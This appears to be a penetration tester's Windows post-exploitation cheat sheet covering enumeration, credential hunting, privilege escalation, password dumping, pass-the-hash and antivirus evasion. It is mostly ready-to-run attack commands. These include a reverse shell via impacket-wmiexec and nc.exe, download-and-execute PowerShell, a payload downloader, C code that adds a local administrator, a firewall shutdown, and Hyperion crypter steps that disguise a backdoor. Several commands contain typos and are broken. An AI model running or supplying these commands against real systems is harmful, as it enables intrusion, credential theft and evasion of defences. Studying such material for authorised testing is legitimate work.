Table of Contents
Enumeration
enum4linux
– script gather information about a window serversmbmap
– List available shares- Find window servers on SUBNET –
nbtscan -r SUBNET
- Basic Info –
whoami /all && ipconfig /all && netstat -an && net user && net accounts && net localgroup administrators && net share
- Test the Guest account
null session
rpcclinet
pre server 2003 server and pre xp sp2
rpcclient -U "" Ipaddress
Blank Password
rpcclient Commands
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
net use
net use \\host\IPC$ /u:”” “”
accesschk.exe
- will popup asking to accept a eula. this is no good when in CLI only in some versions can use
/accepteula
- accesschk accepteula Flag – XORcat
accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators
Search common files and registry
iconv -f utf-16le -t utf-8 < win.reg
convert reg dump to readable format
dir /s *pass*
dir /s *cred*
dir /s *vnc*
dir /s *.config
type c:\sysprep.inf
type c:\sysprep.xml
unattend.xml / Unattended.xml (passwords remove in workstation, password is on servers)
https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/lfi/common-windows-files.txt
# The command below will search the file system for file names containing certain keywords. You can
specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
Common Command reference
systeminfo | findstr /B /C:
– collect OS info
schtasks /query /fo LIST /v
– Scheduled tasks
tasklist /SVC
– running processes
taskkill /F /PID
– kill process
clip
– send output to clipboard
cacls
– file poermissions (XP / Win7)
dir /r
– List alternate data streams
whoami /priv
– list all priv
nltest /DCLIST:[domain]
– List Domain Controllers
findstr
regedit /e FILENAME
dump registry (in UTF-16 format)
net commands
net localgroup group_name UserLoginName /add
net user USERNAME PASSWORD /add
net user USERNAME
– user info
net group "Domain Admins" /domain
net localgroup administrators /domain
netsh
netsh advfirewall firewall add rule name="###" dir=in action=allow protocol=TCP localport=###
netsh advfirewall firewall add rule name="###" dir=in action=allow program="SOMETHING.EXE" enable=yes
netsh advfirewall set allprofiles state off
WMIC
I want to mention WMIC (Windows Management Instrumentation Command-Line) separately as it is Windows most useful command line tool. WIMIC can be very practical for information gathering and post-exploitation. That being said it is a bit clunky and the output leaves much to be desired for.
- XP did not allow access to WMIC from a low privileged account
- Windows 7 Professional and Windows 8 Enterprise allowed low privilege users by default
Windows wmic command line command
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic useraccount get /all /format:csv
– Get all Local Windows Accounts
impacket-wmiexec testuser:testuser@10.11.1.5 "c:\nc.exe 10.11.0.52 443 -e cmd.exe"
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
CLI Service Management
sc
– cmd service management tool
- start / stop service
sc stop SERVICE sc start SERVICE
sc query
– list service
sc queryex SERVICENAME
– extented serive information
# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spoolsv.exe
LOAD_ORDER_GROUP : SpoolerGroup
TAG : 0
DISPLAY_NAME : Print Spooler
DEPENDENCIES : RPCSS
: http
SERVICE_START_NAME : LocalSystem
sc config SERVICE_NAME binpath=bin
– change service binary path
Powershell
echo COMMAND | powershell -ExecutionPolicy Bypass -NoLogo -NoProfile -
– run command not interfactivly
- Get File or directory permission –
Get-ACL {FILE|DIRECTORY} | Fl *
- Display file –
Get-Content {FILENAME}
- Encode file
$RevShell = Get-Content ./FILENAME - Raw $bytes = [System.Test.Encoding]::Unicode.GetBytes($RevShell) $Encoded | Out-File NEWFILE.ps1.b64
- Decode file
$Decode = [System.text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))
- ZIP Decompress –
Add-Type -Assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("c:\ZIPFILE", 'c:\destination\')
- List NTFS File stream –
Get-Item -Stream * PATH
- Read NTFS file stream –
Get-Content FILENAME -Stream 'STREAMNAME'
- Set Credentials, run command as user –
$user = "administrator"; $pw = 'password'; secpw = ConvertTo-SecureString $pw -AsPlainText; $credentail = New-Object System.Management.Automation.PSCredential $user, $secpw Invoke-Command -ComputerName COMPUTER -Credential $cred -ScriptBlock { command }
- download powershell and execute via http –
IEX(New-ObjectNet.WebClient).downloadString('URL'))
- Get auto login password –
Get-RegistryAutoLogon
- Mount share –
New-PSDrive -Name "LOCALNAME" -PSProvider "FileSystem" -Root "UCSPATH"
- To Access –
cd LOCALNAME:
- To Access –
Set-DomainObjectOwner -Identity DESTUSER -OwnerIdentity SOURCEUSER
Add-DomainObjectAcl -TargetIdenttity DESTUSER -PrincipalIdentity SOURCEUSER -Rights ResetPassword -Verbose
Set-DomainUserPassword USER -AccountPassword SECURESTRING -Verbose
- get DLL Version –
$file = Get-Item .\FILE.dll
Windows File transfer
- tftp was installed by default on windows versions before XP / 2003, dont forget
-i
on binary filesatftpd --daemon --no-fork -v --logfile - /usr/share/windows-binaries/
- VBscript, utilize script in artifacts directory. Acts like wget (copy in
~/scripts
) certutil -urlcache -split -f URL DESTINATIONLOCATION
FTP
- required interactive shell, won’t work normally on a netcat shell
- you can use the
-s:
option to specify file with the list of commands to be executed by the client
OPEN 1.1.1.1
USER offsec
ftp
BIN
GET nc.exe
BYE
File Transfer – Powershell
Paste the following script into the target host adjusting the url to the location of the tool(s), acts as http client
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.5/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
Run Script – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -File wget.ps1
- Encode a PS command to Base64 to avoid escaping quotations
echo -n PHERSHELLCOMMAND | iconv --to-code UTF-16LE | base64 -w 0
powershell -EncodedCommand sdfadsfadsfads
vbScript
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("nc_%s.exe");
debug.exe
debug.exe
is an assembler, disassembler, hex dump tool in 32 bit windows- 64k size limit on file it can create
Process
- Compress file
upx -9 filename
created Windows PE binary - convert binary to text
wine exe2bin.exe file.exe file.txt
- paste contents for txt file into shell
SMB
smbclient
smbclient //server/Temp mypasswd_here -W domain -u username
– connect to share
smbclient -I IP ADDRESS -L DOMAIN -N -U
impacket local SMB server
impacket-smbserver
notes
- pyinstaller module can be used to make a exe file from a python script
icacls
used to show windows file permissions
Priv Escalation
windows xp
at 01:58 /interactive cmd.exe
– use at to spawn a shell as SYSTEM
Add user to admin group
- Following C code will add a user to the local admins group on a Windows host
- should be compured using a windows cross compiler
#include <stdlib.h>
int main ()
{
int i;
i = system("net localgroup administrators lowprivuser /add");
return 0;
}
Links
- Privilege Escalation – Windows · Total OSCP Guide
- FuzzySecurity | Windows Privilege Escalation Fundamentals
- Windows Privilege Escalation Methods for Pentesters – Pentest Blog
- Windows Privilege Escalation Scripts & Techniques – Rahmat Nurfauzi – Medium
- Windows Privilege Escalation · OSCP – Useful Resources – links
- Passing OSCP – scund00r
- Windows Privilege Escalation Guide
- Practical Guide to exploiting the unquoted service path vulnerability in Windows – TrustFoundry
- Privilege Escalation | To Shell And Back: Adventures In Pentesting
videos
- Level Up! Practical Windows Privilege Escalation – Andrew Smith – YouTube
- Encyclopaedia Of Windows Privilege Escalation – Brett Moore – YouTube
Password Dumping
- Passwords stored in the SAM (Security Account Manager)
- SYSKEY used to encrypt SAM
- Two hashed
- LAN Manager (LM) – DES
- NT LAN Manager (NTLM) – MD4
LM is Weak
- Passwords longer then 7 Characters split into 2 and can be cracked seperatly
- Converted to UPPERCASE
- Does not include a salt
- LM disavled Vista onwards
- ‘AAD3B435B51404EEAAD3B435B51404EE’ blank hash
NTLM
- Case Sensative
- suppports all Unicode characters
- does not limit to 7 chars
- still not salted
usually displayed in LM:NTLM
format
SAM files in XP
Main files locates into
C:\windows\system32\config\sam
C:\windows\system32\config\system
Need both to crack hashes
Backups located in
C:\windows\repair\system
C:\windows\repair\sam
fgdump
pwdump
and fgdump
are used to dump the SAM out of memory.
The SAM files are exclusivly locked in the file system by the OS.
pwdump
- http://foofus.net/goons/fizzgig/pwdump/
- deprecated use fgdump
fgdump
- cachedumping required to be run as SYSTEM
- http://foofus.net/goons/fizzgig/fgdump/
-h
remote host-u
specify user-p
user password-l
log output-o
disable password history
Windows Credentials Editor (WCE)
What is WCE?
- Tool to manipulate Windows logon sessions–Add, list, delete, modify
- Obtain credentials associated with logon sessions
Pass-the-hash (NTLM) - Pass-the-ticket (Kerberos)
Supports
- Windows XP
- Windows 2003
- Windows Vista
- Windows 7
- Windows 2008
Amplia Security – Research – Windows Credentials Editor (WCE)
wce.exe -w
VNC Passwoird
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: Crack or Decrypt VNC Server Encrypted Password • Raymond.CC
GPP
-
Group Policy Preferences XML
-
Encrypted with AES, the key is published in MSDN http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx
-
Need to find
Groups.xml
in SYSVOL share
Pass the Hash
- Fixed or harder in In 8.1 and above
-
Set the SMBHASH environment variable
root@kali:~# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
-
run
pth-winexe
root@kali:~# pth-winexe -U administrator% //10.11.01.76 cmd
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.dw
C:\Windows\system32>
AV avoidance
- Can test payloads against virustotal.com
- Methods
- Encoding Payloads using msfvenom
- Using binary crypters like Hyperion (windows)
- Writing your own, or using lesser known examples
Hyperion Example
root@kali:~# cp shell\_reverse\_msf\_encoded\_embedded.exe backdoor.exe
root@kali:~# cp /usr/share/windows-binaries/Hyperion-1.0.zip .
root@kali:~# unzip Hyperion-1.0.zip
root@kali:~# cd Hyperion-1.0/
root@kali:~/Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1- win32/libgcc\_s\_sjlj-1.dll .
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++- 6.dll .
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../crypted.exe
Exploits
GitHub – ankh2054/python-exploits: Repository for python exploits
- EternalBlue MS17-10
EternalBlue on Windows XP
Manually Exploiting MS17-010 – LMG Security - MS08-67
Scanner/smb/pipe_auditor
- MS12-037
- MS16-032
- Taviso bug
- Sysret
- upnpservice rewrite
- MS15-057 – priv esc
- Reg key
AlwaysInstallElevated
all MSIs run as SYSTEM
# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.
C:\Windows\system32> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
C:\Windows\system32> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
- missing autoruns
autorunsc.exe -a | findstr /n /R “File\ not\ found”
- RottenPotato
- MOF
- Old exploit Win XP
- Upload MOF file to
%SYSTEMROOT%\wbem\mof\%MOFFILENAME%
the system will auto execute the mof file - Pop Pop Ret: Playing with MOF files on Windows, for fun & profit
links
- GitHub – GDSSecurity/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
- GitHub – SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
- GitHub – abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
- Windows Kernel Exploits | Penetration Testing Lab
Post exploitation frameworks
- Empire
- GitHub – trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
- GitHub – PowerShellMafia/PowerSploit: PowerSploit – A PowerShell Post-Exploitation Framework
- GitHub – samratashok/nishang: Nishang – Offensive PowerShell for penetration testing and offensive security.
Links
- harmj0y – security at the misfortune of others
- GitHub – api0cradle/UltimateAppLockerByPassList: The goal of this repository is to document the most common techniques to bypass AppLocker.
- Windows Post-Exploitation Command List – Google Docs
- How to edit the registry from the command line
- Active Directory Penetration Dojo – AD Environment Enumeration -1 – ScriptDotSh